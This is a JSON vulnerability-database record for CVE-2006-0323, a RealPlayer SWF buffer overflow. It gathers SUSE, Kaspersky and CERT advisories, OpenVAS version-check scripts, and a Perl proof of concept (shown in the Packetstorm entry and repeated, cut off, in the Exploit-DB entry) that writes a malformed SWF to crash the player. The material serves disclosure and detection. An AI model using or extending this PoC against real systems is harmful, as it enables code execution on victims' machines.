file or RPM package:\r\n\r\n 1) Using the internal gpg signatures of the rpm package\r\n 2) MD5 checksums as provided in this announcement\r\n\r\n 1) The internal rpm package signatures provide an easy way to verify the\r\n authenticity of an RPM package. Use the command\r\n\r\n rpm -v --checksig <file.rpm>\r\n\r\n to verify the signature of the package, replacing <file.rpm> with the\r\n filename of the RPM package downloaded. The package is unmodified if it\r\n contains a valid signature from build@suse.de with the key ID 9C800ACA.\r\n\r\n This key is automatically imported into the RPM database (on\r\n RPMv4-based distributions) and the gpg key ring of 'root' during\r\n installation. You can also find it on the first installation CD and at\r\n the end of this announcement.\r\n\r\n 2) If you need an alternative means of verification, use the md5sum\r\n command to verify the authenticity of the packages. Execute the command\r\n\r\n md5sum <filename.rpm>\r\n\r\n after you downloaded the file from a SUSE FTP server or its mirrors.\r\n Then compare the resulting md5sum with the one that is listed in the\r\n SUSE security announcement. Because the announcement containing the\r\n checksums is cryptographically signed (by security@suse.de), the\r\n checksums show proof of the authenticity of the package if the\r\n signature of the announcement is valid. Note that the md5 sums\r\n published in the SUSE Security Announcements are valid for the\r\n respective packages only. Newer versions of these packages cannot be\r\n verified.\r\n\r\n - SUSE runs two security mailing lists to which any interested party may\r\n subscribe:\r\n\r\n suse-security@suse.com\r\n - General Linux and SUSE security discussion.\r\n All SUSE security announcements are sent to this list.\r\n To subscribe, send an e-mail to\r\n <suse-security-subscribe@suse.com>.\r\n\r\n suse-security-announce@suse.com\r\n - SUSE's announce-only mailing list.\r\n Only SUSE's security announcements are sent to this list.\r\n To subscribe, send an e-mail to\r\n <suse-security-announce-subscribe@suse.com>.\r\n\r\n For general information or the frequently asked questions (FAQ),\r\n send mail to <suse-security-info@suse.com> or\r\n <suse-security-faq@suse.com>.\r\n\r\n =====================================================================\r\n SUSE's security contact is <security@suse.com> or <security@suse.de>.\r\n The <security@suse.de> public key is listed below.\r\n =====================================================================\r\n______________________________________________________________________________\r\n\r\n The information in this advisory may be distributed or reproduced,\r\n provided that the advisory is not modified in any way. In particular, the\r\n clear text signature should show proof of the authenticity of the text.\r\n\r\n SUSE Linux Products GmbH provides no warranties of any kind whatsoever\r\n with respect to the information contained in this security advisory.\r\n\r\nType Bits/KeyID Date User ID\r\npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>\r\npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>\r\n\r\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.4.2 (GNU/Linux)\r\n\r\n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\r\n=ypVs\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2 (GNU/Linux)\r\n\r\niQEVAwUBRCKOiXey5gA9JdPZAQIpHwf9GLM/WqEyyhEtMDDXZMsQHtH3boux7jt1\r\nu/n6ZnDT7IbEWqMha7KZkI63V1tmPf3jJlJIG/6TcyqZJDg3qdesMVCYgS0KaO3Z\r\nyV/mMKWQBXRpU0AXpGH6uwVMPGxjRD4eC4spWSWLIw6YATWinLnN9AICilBbqgbQ\r\nD/jx6Ga6G8h+BrkH4ZcEzrLu0LtG+4m2PAv5+TNlFLWrlA90Amy8WNwSqCJtMucq\r\nDOC+Xj158Pd8GI5plL2fP85tvf9lOTl2PCmyFTwrK4Us4t2mjTqtSOvN34++oZ83\r\n4CTXKlrOhElpSp6NyZe56i6U22Sw/EhTw3JqlUadW7Ls91mmpqtn2A==\r\n=Lmof\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] SUSE Security Announcement: RealPlayer security problems (SUSE-SA:2006:018)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "SECURITYVULNS:DOC:11910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11910", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2023-12-06T19:19:52", "description": "### *Detect date*:\n03/23/2006\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in RealNetworks products. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed SWF file.\n\n### *Affected products*:\nRealPlayer for Windows 10.5 versions from 6.0.12.1040 to 6.0.12.1348 \nRealPlayer for Windows 10 all versions \nRealOne Player for Windows v2 & v1 all versions \nRhapsody for Windows 3 versions from 0.815 to 1.0.269 \nRealPlayer for Mac OS 10 versions from 10.0.0.305 to 10.0.0.331 \nRealOne Player for Mac OS all versions \nRealPlayer for Linux versions from 10.0.0.0 to 10.0.0.6 \nHelix Player for Linux versions from 10.0.0.0 to 10.0.0.5\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[RealNetworks bulletin](<http://www.service.real.com/realplayer/security/03162006_player/en/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[RealPlayer](<https://threats.kaspersky.com/en/product/RealPlayer/>)\n\n### *CVE-IDS*:\n[CVE-2006-0323](<https://vulners.com/cve/CVE-2006-0323>)9.3Critical", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "kaspersky", "title": "KLA10310 ACE vulnerability in RealNetworks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2020-06-03T00:00:00", "id": "KLA10310", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10310/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:18", "description": "", "cvss3": {}, "published": "2006-04-01T00:00:00", "type": "packetstorm", "title": "realplayer-swf-PoC.pl.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-04-01T00:00:00", "id": "PACKETSTORM:45093", "href": "https://packetstormsecurity.com/files/45093/realplayer-swf-PoC.pl.txt.html", "sourceData": "`#!/usr/bin/perl \n################################################### \n# RealPlayer: Buffer overflow vulnerability / PoC \n# \n# CVE-2006-0323 \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 \n# \n# RealNetworks Advisory \n# http://service.real.com/realplayer/security/03162006_player/en/ \n# \n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar \n################################################### \n \n# Program received signal SIGSEGV, Segmentation fault. \n# [Switching to Thread -1218976064 (LWP 21932)] \n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so \n \nmy $EGGFILE=\"egg.swf\"; \nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\"; \n \nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\". \n\"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\". \n\"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\". \n\"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\". \n\"\\x00\\x00\\x00\"; \n \n \nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\"; \nprint EGG $header; \n \nfor ($i = 0; $i < 135; $i++) { \n$buffer.= \"\\x90\"; \n} \n \nprint EGG $buffer; \nprint EGG $endheader; \nclose(EGG); \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/45093/realplayer-swf-PoC.pl.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:21", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: linux-realplayer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2016-09-22T00:00:00", "id": "OPENVAS:56446", "href": "http://plugins.openvas.org/nasl.php?oid=56446", "sourceData": "#\n#VID 25858c37-bdab-11da-b7d4-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: linux-realplayer\n\nCVE-2006-0323\nBuffer overflow in multiple RealNetworks products and versions\nincluding RealPlayer 10.x, RealOne Player, Rhapsody 3, and Helix\nPlayer allows remote attackers to have an unknown impact via a\nmalicious SWF file (Flash media).\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://service.real.com/realplayer/security/03162006_player/en/\nhttp://secunia.com/advisories/19358/\nhttp://www.vuxml.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56446);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(17202);\n script_cve_id(\"CVE-2006-0323\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-realplayer\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-realplayer\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.0.1\")>=0 && revcomp(a:bver, b:\"10.0.7.785.20060201\")<0) {\n txt += 'Package linux-realplayer version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:12", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-24.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200603-24 (RealPlayer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:56552", "href": "http://plugins.openvas.org/nasl.php?oid=56552", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"RealPlayer is vulnerable to a buffer overflow that could lead to remote\nexecution of arbitrary code.\";\ntag_solution = \"All RealPlayer users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.7'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200603-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=127352\nhttp://service.real.com/realplayer/security/03162006_player/en/\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200603-24.\";\n\n \n\nif(description)\n{\n script_id(56552);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(17202);\n script_cve_id(\"CVE-2006-0323\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200603-24 (RealPlayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-video/realplayer\", unaffected: make_list(\"ge 10.0.7\"), vulnerable: make_list(\"lt 10.0.7\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2023-12-06T15:29:07", "description": "### Overview\n\nNumerous RealNetworks products are vulnerable to a buffer overflow that may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**RealNetworks RealPlayer**\n\nRealNetworks [RealPlayer](<http://www.real.com/>) is a multimedia application that allows users to view local and remote audio/video content. \n \n**SWF File format** \n \nThe SWF file format is used by Macromedia Flash multimedia files. See the Macromedia [File Format Specification FAQ](<http://www.macromedia.com/licensing/developer/fileformat/faq/>) for more information on the SWF file format. \n \n**The Problem** \n \nNumerous RealNetworks products fail to properly validate SWF files allowing a buffer overflow to occur. By persuading a user to access a specially crafted SWF file with RealPlayer, a remote attacker may be able to execute arbitrary code. \n \n**Considerations** \n \nA complete list of affected software is available in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n \n--- \n \n### Impact\n\nBy convincing a user to open a specially crafted SWF file with RealPlayer, a remote unauthenticated attacker can execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Patch RealPlayer**\n\nApply the patches supplied in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n \n**Disable RealPlayer in your web browser** \n \nAn attacker may be able to exploit this vulnerability by embedding the crafted SWF file in a webpage and convincing a user to access that page. Disabling RealPlayer in the web browser will eliminate this attack vector thereby reducing the chances of exploitation. \n \nTo disable RealPlayer in Microsoft Internet Explorer,disable the RealPlayer ActiveX control. In other web browsers, such as Mozilla Firefox, disable the RealPlayer plugin. \n \n--- \n \n### Vendor Information\n\n231028\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### RealNetworks, Inc. __ Affected\n\nUpdated: March 31, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://service.real.com/realplayer/security/03162006_player/en/>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23231028 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: May 17, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis issue affected RealPlayer in Red Hat Enterprise Linux Extras 3 and 4. Updated packages are available along with our advisory at the URL below and by using the Red Hat Network 'up2date' tool.\n\n<https://rhn.redhat.com/errata/RHSA-2006-0257.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://service.real.com/realplayer/security/03162006_player/en/>\n * <http://www.macromedia.com/licensing/developer/fileformat/faq/>\n * <http://secunia.com/advisories/19358/>\n * <http://secunia.com/advisories/19362/>\n * <http://secunia.com/advisories/19365/>\n * <http://secunia.com/advisories/19390/>\n\n### Acknowledgements\n\nThis issue was reported in RealNetwork Security Update for March 2006. RealNetworks credits John Heasman of NGSSoftware, Greg MacManus of iDEFENSE Labs, and Sowhat of Nevis Labs with providing information about this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0323](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0323>) \n---|--- \n**Severity Metric:** | 10.94 \n**Date Public:** | 2006-03-22 \n**Date First Published:** | 2006-04-01 \n**Date Last Updated: ** | 2006-05-17 12:45 UTC \n**Document Revision: ** | 22 \n", "cvss3": {}, "published": "2006-04-01T00:00:00", "type": "cert", "title": "RealNetworks products vulnerable to buffer overflow via specially crafted flash media file", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-05-17T12:45:00", "id": "VU:231028", "href": "https://www.kb.cert.org/vuls/id/231028", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-12-06T16:33:03", "description": "", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "exploitdb", "title": "RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2006-0323", "CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "EDB-ID:27460", "href": "https://www.exploit-db.com/exploits/27460", "sourceData": "source: https://www.securityfocus.com/bid/17202/info\r\n\r\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\r\n\r\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\r\n\r\n#!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE=\"egg.swf\";\r\nmy 